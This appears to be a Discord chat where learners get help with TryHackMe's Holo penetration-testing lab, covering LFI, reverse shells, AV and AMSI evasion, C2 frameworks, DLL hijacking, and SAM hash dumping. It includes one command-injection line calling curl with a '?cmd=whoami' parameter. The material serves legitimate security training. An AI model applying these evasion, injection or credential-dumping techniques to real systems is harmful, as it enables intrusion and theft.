you won’t be able to just copy paste it onto the machine you’ll need to tweak it slightly to the target
hmmm ok i see, will do a little more research , thanks for the help appreciate it !
got it
I am missing the point of task10
task 10 is more or less just a "practice exploiting some vulnerabilities and see what goes into them and see what actually makes them vulnerable so you can avoid this irl"
I was more like ok so there's a dev environment... should I be getting root somehow?
Or.... I can install this locally...
that's a local thing
i.e. you install and play around if you like
if this is your first time doing web app exploitation, it's recommended, if not, it's whatever
" we have provided a development instance of a test server" ... This to me reads THM have provided...
@lone spruce stop wording things bad
But I get it now.
I just had to reword your babbling
In the meantime I cracked it on my local machine 😅
Stuck at task13. I cannot get my shell to actually output again. Tried combining for zsh, or switch to bash... no luck.
looks like python and socat are not installed 😦
You can get static binaries that will run on any Linux machine of the same architecture for both of those
It’s very very unlikely to see socat installed
Python is more likely but not always there
Hmm there's no internet in holo
you can host them on your own machine, and transfer them from there
since the internal machines can reach your one
Ah yes I can do that
I really need to learn that everything is fair game. And not a CISO game
That doesn’t matter. Like szymex said you can download to your machine and then send on to the other machine
I mean I am usually not busy with trying to break in.
would it be possible to have someone reset holo network, just started on it and the webserver is not responding
Oh my.. The AV evasion part is a challenge for me since I never had to use it 😅 but learning so damn much! 😁 really having fun with the challenges, lot of Homer Simpson "Do'h!" moments.
you'll need to be specific about what subnet you're on. Most people here are on a different one.
If you're on .69, leave and rejoin
Stuck on task 34, uploaded the stager.php file, tried to trigger the php but I can't. Am I missing anything? need help with this
What do you mean by can’t?
I got code execution on my local Windows machine, I successfully bypassed AV, but on the remote server it can't execute my payload
Could you show us what you’re doing, show the payload, etc
Sorry was just away 10.200.142.xx
Edited- After I got back it was stopped 🙂 - ie. problem solved
I can't send screenshots here, can I DM you
You need to verify
!docs verify
!docs verify
send the bot "!verify <token>" you get your discord token in the profile page on thm
Ok
and dm the bot do not post it here in the discord :)
(your token)
Php wrapper i used
my shell.ps1 script works on my local machine with Windows Defender enabled
From the server I got a hit but the payload didn't execute
Got shell from local machine
@wind bobcat It's down again 10.20.142.x used ffuf with -t 10
I don't have control over the individual network instances
Okay guess I have to wait until it shuts down
reset != shutdown
shutdowns preserve the network state
resets restore it from the images we provided
Yeah but hope it will reboot the Webserver so I can continue no others are using the network it seems
I don't believe the docker container is graceful lol
typically, they're not designed to be
@lone spruce
If I had to guess it’s because of character escaping in php. That payload also looks sketch and might still get picked up even if it didn’t on your local machine.
I have a small doubt in task 31 with the code to bypass AMSI, I don’t see it being used anywhere else. According to what I understood, you copy a normal PowerShell payload, you obfuscate it with Invoke-Obfuscation and link it to the php wrapper. Please correct me if I am wrong.
ish
there are a variety of techniques there that can be used
Cleaning, Obfuscation, Bypassing
I think I intended to make a precursor task and then got caught up and forgot about it
But is this right?
So is it important that I add the AMSI bypass with my ps rev shell and obfuscate it together, or do I really need the AMSI bypass ?
Thank you
quick question: inside the docker container my ip seems to be different from the one in the solution? Shouldn't I be able to see it with ifconfig? ie the last octet is xxx, the answer is only x
@wind bobcat ree
go away
I am currently on the DLL Hijacking part on PC-FILESRV01. But I don't see any scheduled tasks that could be used for DLL Hijacking. All of them are in the \Microsoft\Windows\ folder. So i don't think that these binaries will be vulnerable to DLL Hijacking. Any suggestions?
there should be another one that runs a file in a users home folder
Thank you. Seems like we have to reset the network
Gave +1 Rep to @wind bobcat
Hi, I'm struggling with the LFI task on Holo, when I try to read the file it downloads the root page and doesn't actually display the path passed to the parameter, am i missing something?
try curling that URL opposed to accessing it via web
yeah i did and it didn't load
i'll try again
it worked thx, the server might have just crashed when i tried before
it's legitimately broken you nematode
uhhhh am I stupid? this nmap scan doesn't work so instead of x I could try 0-255 right?
192.168.100.0/24 this works so hek, not a network problem
for example, 10.200.104.0/24
you'd replace 104 with whatever subnet thm assigned you to
ah so the subnet is different for everyone,
first network for me, didn't know that
also, the access is only for 9 days..? idk if that would be possible with my University on : P
Oh thanks for that
regarding the dll hijacking I can see the exe file, but I can't see which service is running this?
Does anyone have external resources or videos on the AV evasion module?
Process Doppelgänging: https://www.youtube.com/watch?v=XmWOj-cfixs&list=WL&index=11
Evading Detection: A Beginner's Guide to Obfuscation: https://www.youtube.com/watch?v=lP2KF7_Kwxk&list=WL&index=13
Understanding Modern EDR Tools: How They Work, How They Provide Value, and How to Bypass Them: https://youtu.be/6OF6lA0kCuY
Also you could look each technique for "defense evasion" in MITRE ATT&CK: https://attack.mitre.org/tactics/TA0005/
Also process ghosting is a relatively new technique: https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
You could also consider DLL unhooking... this is also pretty effective
Thank you
Gave +1 Rep to @cobalt isle
Hey, I'm on the last question of task 12 and really struggling with executing a command with the ?cmd= , I've tried just changing a few bits on the curl command given in the task and changed it to this: ||curl -vvv http://admin.holo.live/dashboard.php?cmd=whoami && echo ""|| which doesn't give me anything except the headers (I'll post a screenshot) Can someone give me some help on what I'm missing?
Why the && echo ?
That's included in the example command used on the test environment, it doesn't change the output when I tested without it
Have you tried in a browser ? And if so what could be the difference ?
A good thing to test is to proxy the browser request Through Burp
Ok, I'll try that :)
hey uhh, I added "holo.live" to my /etc/hosts, gobuster seems to work but Firefox still doesn't resolve the holo.live domain for me,
am I doing something wrong?
You need to add "www.holo.live" and likewise with every subdomain
oh
so also add "subdomain.holo.live ip" for every subdomain
Took me a while to figure that out as well 😅
damn, yeah : P I can see why
Is this fairly normal, adding ips /etc/hosts? Didn't see this in any beginner rooms but I do see this in the medium writeups
It depends, you often don't have to do it but when you work with subdomains you have to (I think) like in Holo and the upload vulns room but it's also useful so that you don't have to memorize the ip
Thank you! That worked :)
Gave +1 Rep to @terse hazel
ah that explains, thanks!
Gave +1 Rep to @upper rock
can someone help with task 47? I waited forever to get a hash back (task 46) without luck, and on task 47 I just get an error
Am going to snitch on myself, but it's good because someone else won't fall in the trap...so I got a working shell on S-SRV01 using a command exploit in the PNG file. Exactly the same payload that worked on the Wreath Network....you get a shell as nt authority\system and all...I also dumped the Sam and System hives and extracted the hashes.
Here's the caveat, or where it's all screwed, by not using the AV bypass payload, it means that AMSI is very much alive and whenever you try to upload mimikatz or any powershell script, it gets picked up immediately. So keep that in mind. I'm going to have to patch AMSI because it's the only way I can move forward.
Oh, and there's a netcat binary in the webserver images folder...In my defence, I was testing things out, to see if it'll work and it worked. We can reset the whole thing, I believe that will get rid of it as I've tried deleting it but I keep getting a permission denied.
@outer junco @clear zephyr
Were you not able to bypass AMSI?
That’s probably another user's, if you see another tool like that it’s usually best not to mess with it as it’s another user's. Remember they’re shared instances
The VPN error?
@lone spruce I'm the one who uploaded the netcat binary...I can confirm that 100%...deleting it is the issue, but I figure a network reset will do the trick?
@clear zephyr no, just a plain old netcat shell with AMSI enabled.
Ah I see, yeah if you reset the network you will get fresh images of all the machines
@lone spruce alright
@lone spruce Found another unintended, I think, way of running mimikatz without doing squat about the AMSI bypass
Can I dm or just post it here?
there are no unintendeds here
it is an open lab with intended ways, we guide you through the process we suggest. How you pwn it is up to you
I wouldn't even use an AMSI bypass with mimikatz because it would be on disk and AMSI would assume defender is already instrumented
its more about teaching rather than a challenge
My .ps1 payloads get detected on running even after encoding, but threatcheck just says no threats found, and if I switch the engine to amsi it tells me to ensure real-time protection is enabled, which it is
@lone spruce Noted
what is the error when you run it?
It gets detected by the av, but when I run it against threatcheck it says that no threats were found
have you tried not putting it on disk?
Yes
and what error did it give you
Doesn’t give me an error just says that no threats were found(threatcheck) but on execution it gets caught
Yes
The script contains malicious content and has been blocked by your antivirus software
have you tried just throwing Invoke-Obf on it?
honestly the ps1 payloads suck, that's why we suggest covenant, it's a lot easier to work with
Yes, it still gets caught by defender
IMO use a different payload or just keep throwing things at it until it sticks
I didn’t set up covenant cause I still use starkiller from the throwback lab but according to what I read it gives out the same ps oneliner right?
a ps1 one liner in one c2 is not the same as another c2
Oh
they are the same initializers because that one works
but the only thing that matters is the encoded data inside
which is what gets picked up
you can pretty easily obfuscate the empire code with the built in invoke-obfuscation
but if you're only obfuscating the one liner itself of course it's getting picked up
Okay, so let me try to gen the shell with covenant, obfuscate it and then try it out
you can still use empire easy peasy just some different steps involved
Will try that out if this doesn’t work
I can’t select a listener or implant template in the launchers tab for binary in covenant
Have you created a listener?
Could you show us?
just saying something's not working doesn’t help me to help you at all
I created a default http profile, edited the connect port and address
